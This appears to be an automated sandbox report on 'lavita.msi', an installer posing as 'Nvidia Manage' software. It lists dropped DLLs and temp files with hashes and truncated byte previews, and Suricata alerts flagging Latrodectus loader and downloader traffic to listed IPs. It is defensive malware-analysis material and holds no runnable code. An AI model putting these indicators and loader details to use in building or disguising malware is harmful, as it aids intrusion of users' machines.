                                                                                                                                • Filename: Document-v09-42-38.js, Detection: malicious, Browse
                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                C:\Windows\Installer\MSIC35F.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):446944
                                                                                                                                Entropy (8bit):6.403916470886214
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                C:\Windows\Installer\MSIC39F.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):446944
                                                                                                                                Entropy (8bit):6.403916470886214
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                C:\Windows\Installer\MSIC3DE.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):446944
                                                                                                                                Entropy (8bit):6.403916470886214
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                C:\Windows\Installer\MSIC4AA.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1804
                                                                                                                                Entropy (8bit):5.554938100823992
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:0xe9dt7LlAOlwhQlsP3IOXXL5D8SXld3l4e:0xert/lplAQlslXXlFlp
                                                                                                                                MD5:1C696A5241A9DD84D7D23755CE803529
                                                                                                                                SHA1:7845AA1FDC2161340B7131B56D2710ED941187C7
                                                                                                                                SHA-256:B91E8017168D360282B616B093E1648BD8CD1DC13CE9779F36C18BECEC22C5EF
                                                                                                                                SHA-512:12762C5EAFAAA50EB99E02E1C0D4658ED45EFA656B4EC31131515F324796EA3D911E643210AC8E253074B477215B793EC0C976E7D336F5E48D730FAB4607295A
                                                                                                                                Malicious:false
                                                                                                                                Preview:...@IXOS.@.....@.^.Y.@.....@.....@.....@.....@.....@......&.{6526CBB4-D28A-4CBC-AF93-907FED1F0EB9}..Nvidia Manage..lavita.msi.@.....@..@..@.....@........&.{943AE3C8-CB21-42BD-93F4-79BEC1C03CE0}.....@.....@.....@.....@.......@.....@.....@.......@......Nvidia Manage......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}B.C:\Users\user\AppData\Roaming\Nvidia Manage INC\Nvidia Manage\.@.......@.....@.....@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}4.01:\Software\Nvidia Manage INC\Nvidia Manage\Version.@.......@.....@.....@......&.{D674043B-F548-4EAE-B311-F2B735308BAE}6.C:\Users\user\AppData\Roaming\gpuset\appgpuset.dll.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".B.C:\Users\user\AppData\Roaming\Nvidia Manage INC\Nvidia Manage\.@........InstallFiles..Copying new files&.File: [1], Di

                                                                                                                                C:\Windows\Installer\SourceHash{6526CBB4-D28A-4CBC-AF93-907FED1F0EB9}

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):1.1626304090275925
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:JSbX72FjoSAGiLIlHVRpth/7777777777777777777777777vDHF1GKppSl0i8Q:JRQI5pOyF
                                                                                                                                MD5:76ADF52004ECDE9DF40A9B8F54E18B23
                                                                                                                                SHA1:4A62DBC0335490FBD81030F534A6D76F986FA978
                                                                                                                                SHA-256:3704163FFA35F2316CD3A5527E3331B80E8D2E6E5DDD82F7AC4BA60CDC1D9FC4
                                                                                                                                SHA-512:FE842D788CED3ED4C5ADFD314EB5CA39CC11C60F3B57B420AE26DD8EDAA37E783016516F9EF7B69B1B7097555581AEEE965152A388ECEB687E4F1D11515E0656
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):1.5580068433685121
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:Z8PhUuRc06WXJanT5dtofjRSHfjvAEbCy8sBLfjRSHfjLT9:UhU1RnTjirRUrIwCBeLrRUrd
                                                                                                                                MD5:27ED7019F2F64FF1A492C8540EB13E2F
                                                                                                                                SHA1:D3716072E93BE7E3802B19E332EA85FC5778C42B
                                                                                                                                SHA-256:E7B907DFD9F2156272C4F1C25FD88847A8342593E6946AD2A7C9312582859F80
                                                                                                                                SHA-512:585FF7AC59820978654A8A8BA2D0477347C1C0864D98FAA85492736F7FE336CB720720035B8DAD1858C68D9BC6DDCA1A1331D3BF16B193DD8FE8316C3F6E8D1C
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):360001
                                                                                                                                Entropy (8bit):5.362994994579666
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgau/:zTtbmkExhMJCIpEm
                                                                                                                                MD5:D66847D2A3E0D8C409D192375A66A0A1
                                                                                                                                SHA1:365A8F9572DDB8EB21FCB379F3E2F61A5DB23FA6
                                                                                                                                SHA-256:9612F27159B9D2378E4E81707C86D3C03F4302413465AD26801BDDEF6A5E625A
                                                                                                                                SHA-512:ECD539789D6669F4A26C42303DE646662493E048509F82599861CC71B6C4841FEDDDCBFF5EABE54D01B2889FF4D75203B8BA67FE17918E0899A5B149F381C1CF
                                                                                                                                Malicious:false
                                                                                                                                Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                                                                                                                C:\Windows\Temp\~DF2FB27F0A3D82C1DE.TMP

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):32768
                                                                                                                                Entropy (8bit):1.249671505576837
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:zvcuJM+CFXJpT59tofjRSHfjvAEbCy8sBLfjRSHfjLT9:jc3RTDirRUrIwCBeLrRUrd
                                                                                                                                MD5:1812435400E23EEBB74298F6C68954F0
                                                                                                                                SHA1:AAC8E63024884D3638D4B7C7CF904D113FC2B1D5
                                                                                                                                SHA-256:754793E25CB79107796793B252D145AF6AE37F6153D21B4AF614B04C52950A7B
                                                                                                                                SHA-512:8BCA391EB1AD770BE68D0BC5CE8469440EF1F7EAF8C5AC35CBE00C6DB2667DC90797D0451C60FAB1A1F77D441C19320D4B9DAAF98E037FE14DBE3738D259D468
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Windows\Temp\~DF57DC01BEADDB104A.TMP

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):512
                                                                                                                                Entropy (8bit):0.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3::
                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                Malicious:false
                                                                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Windows\Temp\~DF5F817CD448FE08F8.TMP

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):73728
                                                                                                                                Entropy (8bit):0.13578752362456797
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:pHorTxksfjRipVksfj/ksfjRipVksfjvAEVkyjCy8sVgwGQ2q+6I:GrTLfjRSHfjVfjRSHfjvAEbCy8sBbt
                                                                                                                                MD5:9B301DD8617E14F2AC1DDE27ABD85DE5
                                                                                                                                SHA1:4D729299F16A808600E7C78BA1E32B10BA5771B2
                                                                                                                                SHA-256:3256A8899DACAB7DB9B6785DB72CD0E8549963F2F4C05AE9A024B701D3802388
                                                                                                                                SHA-512:27717F5C9CDDEA3F1074E4F5507125650F402716DE15F1F111A4D2FFBC0853F2C317B72BD33451C80CE6DC24C848AFAF9554F8BD4D5B7A69FA4F77EB34162812
                                                                                                                                Malicious:false
                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Windows\Temp\~DF665E47D56780A76B.TMP

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):32768
                                                                                                                                Entropy (8bit):1.249671505576837
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:zvcuJM+CFXJpT59tofjRSHfjvAEbCy8sBLfjRSHfjLT9:jc3RTDirRUrIwCBeLrRUrd
                                                                                                                                MD5:1812435400E23EEBB74298F6C68954F0
                                                                                                                                SHA1:AAC8E63024884D3638D4B7C7CF904D113FC2B1D5
                                                                                                                                SHA-256:754793E25CB79107796793B252D145AF6AE37F6153D21B4AF614B04C52950A7B
                                                                                                                                SHA-512:8BCA391EB1AD770BE68D0BC5CE8469440EF1F7EAF8C5AC35CBE00C6DB2667DC90797D0451C60FAB1A1F77D441C19320D4B9DAAF98E037FE14DBE3738D259D468
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Windows\Temp\~DF66725125C1D055EB.TMP

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):512
                                                                                                                                Entropy (8bit):0.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3::
                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                Malicious:false
                                                                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Windows\Temp\~DF7D42A30AF43C2215.TMP

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):32768
                                                                                                                                Entropy (8bit):0.06939827639992935
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO1TgZVhwIKBYtQVky6lS:2F0i8n0itFzDHF1GKIS
                                                                                                                                MD5:FC28DFFCEF979516818069E70E987E2F
                                                                                                                                SHA1:5D03D22CB808BC0D5E0241D7C15DFAB99D4325B7
                                                                                                                                SHA-256:0B975C634B3F45B20745117F512A391E2F889282D770C8B790027AECB5639206
                                                                                                                                SHA-512:B2B7DFD09199444594B413FF134BE2FE1961D5699138F47683D3649D9262741A02421A2BBCA8DA10211A4A6E767E7B1BC841A6156EDDC58044C9A5A07B053927
                                                                                                                                Malicious:false
                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Windows\Temp\~DF8F58A8649EC3E2C7.TMP

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):512
                                                                                                                                Entropy (8bit):0.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3::
                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                Malicious:false
                                                                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Windows\Temp\~DFB3CC0A0F3DD4FE56.TMP

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):1.5580068433685121
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:Z8PhUuRc06WXJanT5dtofjRSHfjvAEbCy8sBLfjRSHfjLT9:UhU1RnTjirRUrIwCBeLrRUrd
                                                                                                                                MD5:27ED7019F2F64FF1A492C8540EB13E2F
                                                                                                                                SHA1:D3716072E93BE7E3802B19E332EA85FC5778C42B
                                                                                                                                SHA-256:E7B907DFD9F2156272C4F1C25FD88847A8342593E6946AD2A7C9312582859F80
                                                                                                                                SHA-512:585FF7AC59820978654A8A8BA2D0477347C1C0864D98FAA85492736F7FE336CB720720035B8DAD1858C68D9BC6DDCA1A1331D3BF16B193DD8FE8316C3F6E8D1C
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Windows\Temp\~DFBFF75E3A866B4CAA.TMP

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):32768
                                                                                                                                Entropy (8bit):1.249671505576837
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:zvcuJM+CFXJpT59tofjRSHfjvAEbCy8sBLfjRSHfjLT9:jc3RTDirRUrIwCBeLrRUrd
                                                                                                                                MD5:1812435400E23EEBB74298F6C68954F0
                                                                                                                                SHA1:AAC8E63024884D3638D4B7C7CF904D113FC2B1D5
                                                                                                                                SHA-256:754793E25CB79107796793B252D145AF6AE37F6153D21B4AF614B04C52950A7B
                                                                                                                                SHA-512:8BCA391EB1AD770BE68D0BC5CE8469440EF1F7EAF8C5AC35CBE00C6DB2667DC90797D0451C60FAB1A1F77D441C19320D4B9DAAF98E037FE14DBE3738D259D468
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Windows\Temp\~DFC7B231B57EDD9B41.TMP

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):512
                                                                                                                                Entropy (8bit):0.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3::
                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                Malicious:false
                                                                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Windows\Temp\~DFF350AB211493C231.TMP

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):1.5580068433685121
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:Z8PhUuRc06WXJanT5dtofjRSHfjvAEbCy8sBLfjRSHfjLT9:UhU1RnTjirRUrIwCBeLrRUrd
                                                                                                                                MD5:27ED7019F2F64FF1A492C8540EB13E2F
                                                                                                                                SHA1:D3716072E93BE7E3802B19E332EA85FC5778C42B
                                                                                                                                SHA-256:E7B907DFD9F2156272C4F1C25FD88847A8342593E6946AD2A7C9312582859F80
                                                                                                                                SHA-512:585FF7AC59820978654A8A8BA2D0477347C1C0864D98FAA85492736F7FE336CB720720035B8DAD1858C68D9BC6DDCA1A1331D3BF16B193DD8FE8316C3F6E8D1C
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Windows\Temp\~DFF6147CE335ACCA0A.TMP

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):512
                                                                                                                                Entropy (8bit):0.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3::
                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                Malicious:false
                                                                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                Static File Info

                                                                                                                                General

                                                                                                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {943AE3C8-CB21-42BD-93F4-79BEC1C03CE0}, Number of Words: 10, Subject: Nvidia Manage, Author: Nvidia Manage INC, Name of Creating Application: Nvidia Manage, Template: ;1033, Comments: Create database IInlimited, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                Entropy (8bit):7.734482900935259
                                                                                                                                TrID:
                                                                                                                                • Windows SDK Setup Transform Script (63028/2) 47.91%
                                                                                                                                • Microsoft Windows Installer (60509/1) 46.00%
                                                                                                                                • Generic OLE2 / Multistream Compound File (8008/1) 6.09%
                                                                                                                                File name:lavita.msi
                                                                                                                                File size:2'416'640 bytes
                                                                                                                                MD5:b4d82d17669303be46edbf7b7c5823a2
                                                                                                                                SHA1:1d8e902129f1bfba8d349403b5d45a737d1372c3
                                                                                                                                SHA256:f071f083770fe89d0860ba0cf46eda960d3ccf31639a18dda8954a0c026165d9
                                                                                                                                SHA512:a97e93833d37c7e0d1f01a58a86cdc97dc8ab3cc2d7a0e458b158627ff61c625cddbbee8daaacbe9efae3f413afe5b605156c3a6803ef1a68fbfcd921a55dff6
                                                                                                                                SSDEEP:49152:XqfTYBZKumZr7A31su1uXZn8Ud9JCM5Rm5hfJYPYtwRXIhMRs:oYnK/AhuSyJN5RmjJvi4+
                                                                                                                                TLSH:2CB502223386C637C95E0270352A929B1178FDAB8B7140D7A3C9391EADB44D06A7DFD6
                                                                                                                                File Content Preview:........................>...................%...................................D.......`......................................./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F..................................

                                                                                                                                File Icon

                                                                                                                                Icon Hash:2d2e3797b32b2b99

                                                                                                                                Network Behavior

                                                                                                                                Suricata IDS Alerts

                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                2024-12-17T17:56:49.563810+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649935172.67.161.60443TCP
                                                                                                                                2024-12-17T17:56:49.586025+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.649935172.67.161.60443TCP
                                                                                                                                2024-12-17T17:56:52.748552+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649942172.67.161.60443TCP
                                                                                                                                2024-12-17T17:56:53.404984+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.649942172.67.161.60443TCP
                                                                                                                                2024-12-17T17:56:54.863333+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649947172.67.161.60443TCP
                                                                                                                                2024-12-17T17:56:55.607786+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.649947172.67.161.60443TCP
                                                                                                                                2024-12-17T17:56:58.125221+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649959104.21.16.1443TCP
                                                                                                                                2024-12-17T17:56:59.789799+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.649959104.21.16.1443TCP
                                                                                                                                2024-12-17T17:57:01.029378+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649965104.21.16.1443TCP
                                                                                                                                2024-12-17T17:57:05.181169+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649965104.21.16.1443TCP
                                                                                                                                2024-12-17T17:57:05.181169+01002018052ET MALWARE Zbot Generic URI/Header Struct .bin1192.168.2.649965104.21.16.1443TCP
                                                                                                                                2024-12-17T17:57:06.421171+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649978104.21.16.1443TCP
                                                                                                                                2024-12-17T17:57:08.261240+01002018052ET MALWARE Zbot Generic URI/Header Struct .bin1192.168.2.649978104.21.16.1443TCP
                                                                                                                                2024-12-17T17:57:09.487377+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649989104.21.16.1443TCP
                                                                                                                                2024-12-17T17:57:11.365156+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649989104.21.16.1443TCP
